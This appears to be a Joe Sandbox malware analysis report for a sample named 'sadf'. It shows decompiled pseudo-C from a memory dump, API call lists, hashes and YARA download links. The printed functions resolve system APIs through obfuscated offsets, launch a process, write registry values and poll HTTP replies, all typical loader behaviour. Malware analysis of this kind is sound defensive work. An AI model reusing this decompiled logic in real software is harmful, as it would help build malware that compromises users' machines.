				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x8ca3dc; // 0x1309868
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E008C540A();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E008C540A();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E008C2C2A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E008C2C2A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E008C5C2F(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x8c918c;
						}
						_t70 = E008C224E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E008C7A71(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x8ca348; // 0xa3d5a8
								_t102 =  *0x8ca138; // 0x8c7db3
								_t28 = _t105 + 0x8cbb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E008C5C2F(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x8c9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E008C7A71(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E008C789E(_v24);
								} else {
									_t92 =  *0x8ca348; // 0xa3d5a8
									_t44 = _t92 + 0x8cbc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E008C789E(_v8);
						}
						E008C789E(_v12);
					}
					E008C789E(_v16);
				}
				return _v28;
			}

0x008c41cb
0x008c41d3
0x008c41d6
0x008c41e3
0x008c41e6
0x008c41ed
0x008c41f4
0x008c41f7
0x008c4204
0x008c4207
0x008c420a
0x008c420f
0x008c4214
0x008c421c
0x008c4221
0x008c4226
0x008c422c
0x008c4230
0x008c4239
0x008c423d
0x008c423f
0x008c423f
0x008c4247
0x008c424c
0x008c4251
0x008c4257
0x008c425e
0x008c426f
0x008c4276
0x008c4288
0x008c428d
0x008c4292
0x008c429b
0x008c42a4
0x008c42ad
0x008c42c3
0x008c42c8
0x008c42cc
0x008c42d0
0x008c42d5
0x008c42da
0x008c42dc
0x008c42dc
0x008c42e6
0x008c42ef
0x008c42f6
0x008c4312
0x008c4316
0x008c434f
0x008c4318
0x008c431b
0x008c4323
0x008c4334
0x008c433c
0x008c4344
0x008c4348
0x008c4348
0x008c4316
0x008c4357
0x008c4357
0x008c435f
0x008c435f
0x008c4367
0x008c4367
0x008c4373

APIs

GetTickCount.KERNEL32 ref: 008C41DD
lstrlen.KERNEL32(00000000,00000005), ref: 008C425E
lstrlen.KERNEL32(?), ref: 008C426F
lstrlen.KERNEL32(00000000), ref: 008C4276
lstrlenW.KERNEL32(80000002), ref: 008C427D
lstrlen.KERNEL32(?,00000004), ref: 008C42E6
lstrlen.KERNEL32(?), ref: 008C42EF
lstrlen.KERNEL32(?), ref: 008C42F6
lstrlenW.KERNEL32(?), ref: 008C42FD

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 1deeec098b67f3c69d5fa7280538aa6aa83d77c23f8ba68ccf7477647858145d
Instruction ID: 2e2a5b418cbe863804e5c819d8dd179ac29e12fcfeb36b14ddc944cceebdc376
Opcode Fuzzy Hash: 1deeec098b67f3c69d5fa7280538aa6aa83d77c23f8ba68ccf7477647858145d
Instruction Fuzzy Hash: E8519A72D00219ABCF12AFA8DC09EDE7BB5FF84314F058069F904A7221DB35CA51DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008C3BF0 Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E008C3BF0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E008C2AA6(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E008C7A86( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x8ca300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x8ca348; // 0xa3d5a8
					_t18 = _t47 + 0x8cb3f3; // 0x73797325
					_t68 = E008C3A12(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x8ca348; // 0xa3d5a8
						_t19 = _t50 + 0x8cb73f; // 0x1308ce7
						_t20 = _t50 + 0x8cb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E008C2058();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E008C2058();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x8ca2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E008C789E(_t70);
				goto L12;
			}

0x008c3bf8
0x008c3bf8
0x008c3c07
0x008c3c0e
0x008c3c13
0x008c3d20
0x008c3d27
0x008c3d27
0x008c3c22
0x008c3c2a
0x008c3c2d
0x008c3c32
0x008c3c47
0x008c3c4d
0x008c3c4e
0x008c3c51
0x008c3c57
0x008c3c5a
0x008c3c5f
0x008c3c67
0x008c3c73
0x008c3c77
0x008c3d07
0x008c3c7d
0x008c3c7d
0x008c3c82
0x008c3c89
0x008c3c9d
0x008c3ca1
0x008c3cf0
0x008c3ca3
0x008c3ca4
0x008c3cab
0x008c3cc4
0x008c3cc6
0x008c3cca
0x008c3cd1
0x008c3ceb
0x008c3cd3
0x008c3cdc
0x008c3ce1
0x008c3ce1
0x008c3cd1
0x008c3cff
0x008c3cff
0x008c3c77
0x008c3d0e
0x008c3d17
0x008c3d1b
0x00000000

APIs

Part of subcall function 008C2AA6: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,008C3C0C,?,?,?,?,00000000,00000000), ref: 008C2ACB
Part of subcall function 008C2AA6: GetProcAddress.KERNEL32(00000000,7243775A), ref: 008C2AED
Part of subcall function 008C2AA6: GetProcAddress.KERNEL32(00000000,614D775A), ref: 008C2B03
Part of subcall function 008C2AA6: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 008C2B19
Part of subcall function 008C2AA6: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 008C2B2F
Part of subcall function 008C2AA6: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 008C2B45

memset.NTDLL ref: 008C3C5A

Part of subcall function 008C3A12: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,008C3C73,73797325), ref: 008C3A23
Part of subcall function 008C3A12: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 008C3A3D

GetModuleHandleA.KERNEL32(4E52454B,01308CE7,73797325), ref: 008C3C90
GetProcAddress.KERNEL32(00000000), ref: 008C3C97
HeapFree.KERNEL32(00000000,00000000), ref: 008C3CFF

Part of subcall function 008C2058: GetProcAddress.KERNEL32(36776F57,008C58B5), ref: 008C2073

CloseHandle.KERNEL32(00000000,00000001), ref: 008C3CDC
CloseHandle.KERNEL32(?), ref: 008C3CE1
GetLastError.KERNEL32(00000001), ref: 008C3CE5

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: d3be7d3b64b48d403c51e5a512e8246c2ad7b686664ae600a952a50237cf6c5a
Instruction ID: 30b77b7d4f757d9dd0d770ec227c36e855c43b74bd202bf264548457ddcf045d
Opcode Fuzzy Hash: d3be7d3b64b48d403c51e5a512e8246c2ad7b686664ae600a952a50237cf6c5a
Instruction Fuzzy Hash: C1314FB2800619AFDB10AFA4DC89E9EBBBCFB08344F1044A9FA46E7121D735DE45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008C4E4D Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C4E4D(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E008C7A71(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E008C789E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E008C2129( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x008c4e4d
0x008c4e4d
0x008c4e5d
0x008c4e60
0x008c4e64
0x008c4e6a
0x008c4e6f
0x008c4e88
0x008c4e9c
0x008c4ea3
0x008c4eaa
0x008c4efd
0x008c4f03
0x008c4f09
0x008c4f44
0x008c4f4a
0x00000000
0x00000000
0x00000000
0x008c4f09
0x008c4eb0
0x00000000
0x008c4eb7
0x008c4ec5
0x008c4ec8
0x008c4ecb
0x008c4ed7
0x008c4edb
0x008c4f3d
0x008c4edd
0x008c4eef
0x008c4f2d
0x008c4f38
0x008c4ef1
0x008c4ef4
0x008c4ef8
0x008c4ef8
0x008c4eef
0x00000000
0x008c4edb
0x008c4eb0
0x008c4e74
0x008c4e7a
0x008c4e7d
0x008c4e82
0x00000000
0x00000000
0x00000000
0x008c4f12
0x008c4f1a
0x008c4f1f
0x008c4f22
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 008C4E64
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,008C3897,00000000,?), ref: 008C4E74
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 008C4EA6
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 008C4ECB
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 008C4EEB
GetLastError.KERNEL32 ref: 008C4EFD

Part of subcall function 008C2129: WaitForMultipleObjects.KERNEL32(00000002,008C7C1D,00000000,008C7C1D,?,?,?,008C7C1D,0000EA60), ref: 008C2144

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

GetLastError.KERNEL32(00000000), ref: 008C4F32

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: b2b9c87a76fd5c942c215247ff5a777530eba88b35db45f8e2a6f5f303b77d71
Instruction ID: 5df4ba2a15fef124281e2c6cbb03eae52238f759440be8c12b15d424e6480f07
Opcode Fuzzy Hash: b2b9c87a76fd5c942c215247ff5a777530eba88b35db45f8e2a6f5f303b77d71
Instruction Fuzzy Hash: 3D3100B5900709EFDB21DFA5C894E9EBBB8FB08314F1059AEE542E2151DB30EA84DF11

Uniqueness

Uniqueness Score: -1.00%

Function 008C5E6F Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 008C5EC9
SysAllocString.OLEAUT32(0070006F), ref: 008C5EDD
SysAllocString.OLEAUT32(00000000), ref: 008C5EEF
SysFreeString.OLEAUT32(00000000), ref: 008C5F57
SysFreeString.OLEAUT32(00000000), ref: 008C5F66
SysFreeString.OLEAUT32(00000000), ref: 008C5F71

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 51ebebe72a618eda79948894570d5f481c090c7e238b6172f8bbf2d100c21bf7
Instruction ID: c9c18d1b45c167481d85e9ba5a61625e4700464c39906634bc488be841b7bb66
Opcode Fuzzy Hash: 51ebebe72a618eda79948894570d5f481c090c7e238b6172f8bbf2d100c21bf7
Instruction Fuzzy Hash: 6D414E32910A09ABDF01DFBCD845AAEB7B9FF49300F144469E911EB120DA71EE45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008C2AA6 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C2AA6(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E008C7A71(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x8ca348; // 0xa3d5a8
					_t1 = _t23 + 0x8cb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x8ca348; // 0xa3d5a8
					_t2 = _t26 + 0x8cb761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E008C789E(_t54);
					} else {
						_t30 =  *0x8ca348; // 0xa3d5a8
						_t5 = _t30 + 0x8cb74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x8ca348; // 0xa3d5a8
							_t7 = _t33 + 0x8cb771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x8ca348; // 0xa3d5a8
								_t9 = _t36 + 0x8cb4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x8ca348; // 0xa3d5a8
									_t11 = _t39 + 0x8cb786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E008C2156(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x008c2ab5
0x008c2ab9
0x008c2b7b
0x008c2abf
0x008c2abf
0x008c2ac4
0x008c2ad7
0x008c2ad9
0x008c2ade
0x008c2ae6
0x008c2aed
0x008c2aef
0x008c2af4
0x008c2b73
0x008c2b74
0x008c2af6
0x008c2af6
0x008c2afb
0x008c2b03
0x008c2b05
0x008c2b0a
0x00000000
0x008c2b0c
0x008c2b0c
0x008c2b11
0x008c2b19
0x008c2b1b
0x008c2b20
0x00000000
0x008c2b22
0x008c2b22
0x008c2b27
0x008c2b2f
0x008c2b31
0x008c2b36
0x00000000
0x008c2b38
0x008c2b38
0x008c2b3d
0x008c2b45
0x008c2b47
0x008c2b4c
0x00000000
0x008c2b4e
0x008c2b54
0x008c2b59
0x008c2b60
0x008c2b65
0x008c2b6a
0x00000000
0x008c2b6c
0x008c2b6f
0x008c2b6f
0x008c2b6a
0x008c2b4c
0x008c2b36
0x008c2b20
0x008c2b0a
0x008c2af4
0x008c2b89

APIs

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,008C3C0C,?,?,?,?,00000000,00000000), ref: 008C2ACB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 008C2AED
GetProcAddress.KERNEL32(00000000,614D775A), ref: 008C2B03
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 008C2B19
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 008C2B2F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 008C2B45

Part of subcall function 008C2156: memset.NTDLL ref: 008C21D5

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 6579d13d8fff707be7812962103e90f819ee8429ed90c3dbd78dfe3dae456a6e
Instruction ID: 6c6c45b7d01c490ffb89cf951a70bab40986a7d8fb79652d1440f87b0fc5854b
Opcode Fuzzy Hash: 6579d13d8fff707be7812962103e90f819ee8429ed90c3dbd78dfe3dae456a6e
Instruction Fuzzy Hash: 8721F2B1600B0AAFD710DF69C889E6ABBFCFF44B54B04406AE905C7261E770ED048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C2331 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E008C2331(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x8ca3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E008C3D2E( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E008C2087(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E008C789E(_a8);
						goto L29;
					}
					_t64 =  *0x8ca318; // 0x1309d08
					_t16 = _t64 + 0xc; // 0x1309e2a
					_t65 = E008C3D2E(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d008c90
						if(E008C6BEB(_t97,  *_t33, _t91, _a8,  *0x8ca3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x8ca348; // 0xa3d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x8cba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x8cba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E008C41C5(_t69,  *0x8ca3d4,  *0x8ca3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x8ca348; // 0xa3d5a8
									_t44 = _t71 + 0x8cb842; // 0x74666f53
									_t73 = E008C3D2E(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d008c90
										E008C187F( *_t47, _t91, _a8,  *0x8ca3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d008c90
										E008C187F( *_t49, _t91, _t99,  *0x8ca3d0, _a16);
										E008C789E(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d008c90
									E008C187F( *_t40, _t91, _a8,  *0x8ca3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d008c90
									E008C187F( *_t43, _t91, _a8,  *0x8ca3d0, _a16);
								}
								if( *_t101 != 0) {
									E008C789E(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d008c90
					_t81 = E008C78B3( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d008c90
							E008C6BEB(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E008C789E(_t100);
						_t98 = _a16;
					}
					E008C789E(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E008C7A86(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x8ca3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x008c2331
0x008c233a
0x008c2341
0x008c2346
0x008c23b3
0x008c23b9
0x008c23be
0x008c23c5
0x008c23ca
0x008c23cf
0x008c253a
0x008c2541
0x008c2541
0x008c2546
0x008c2548
0x008c2548
0x008c2551
0x008c2551
0x008c23d5
0x008c23e1
0x008c2530
0x008c2533
0x00000000
0x008c2533
0x008c23e7
0x008c23ec
0x008c23ef
0x008c23f4
0x008c23f9
0x008c2442
0x008c2442
0x008c2455
0x008c245f
0x008c2465
0x008c246c
0x008c2476
0x008c2476
0x008c246e
0x008c246e
0x008c246e
0x008c246e
0x008c2498
0x008c24a0
0x008c24ce
0x008c24d3
0x008c24da
0x008c24df
0x008c24e3
0x008c2515
0x008c24e5
0x008c24f2
0x008c24f5
0x008c2505
0x008c2508
0x008c250e
0x008c250e
0x008c24a2
0x008c24af
0x008c24b2
0x008c24c4
0x008c24c7
0x008c24c7
0x008c251f
0x008c252b
0x008c2521
0x008c2524
0x008c2524
0x008c251f
0x008c2498
0x00000000
0x008c245f
0x008c2408
0x008c240b
0x008c2412
0x008c2418
0x008c241b
0x008c241d
0x008c2429
0x008c242c
0x008c242c
0x008c2432
0x008c2437
0x008c2437
0x008c243d
0x00000000
0x008c243d
0x008c234b
0x00000000
0x008c2372
0x008c2372
0x008c237e
0x008c2391
0x008c2397
0x008c239f
0x00000000
0x008c239f

APIs

StrChrA.SHLWAPI(008C68B1,0000005F,00000000,00000000,00000104), ref: 008C2364
lstrcpy.KERNEL32(?,?), ref: 008C2391

Part of subcall function 008C3D2E: lstrlen.KERNEL32(?,00000000,01309D08,00000000,008C695F,01309F2B,69B25F44,?,?,?,?,69B25F44,00000005,008CA00C,4D283A53,?), ref: 008C3D35
Part of subcall function 008C3D2E: mbstowcs.NTDLL ref: 008C3D5E
Part of subcall function 008C3D2E: memset.NTDLL ref: 008C3D70

Part of subcall function 008C187F: lstrlenW.KERNEL32(?,?,?,008C24FA,3D008C90,80000002,008C68B1,008C1629,74666F53,4D4C4B48,008C1629,?,3D008C90,80000002,008C68B1,?), ref: 008C18A4

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

lstrcpy.KERNEL32(?,00000000), ref: 008C23B3

Strings

\, xrefs: 008C2397
(, xrefs: 008C2414

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

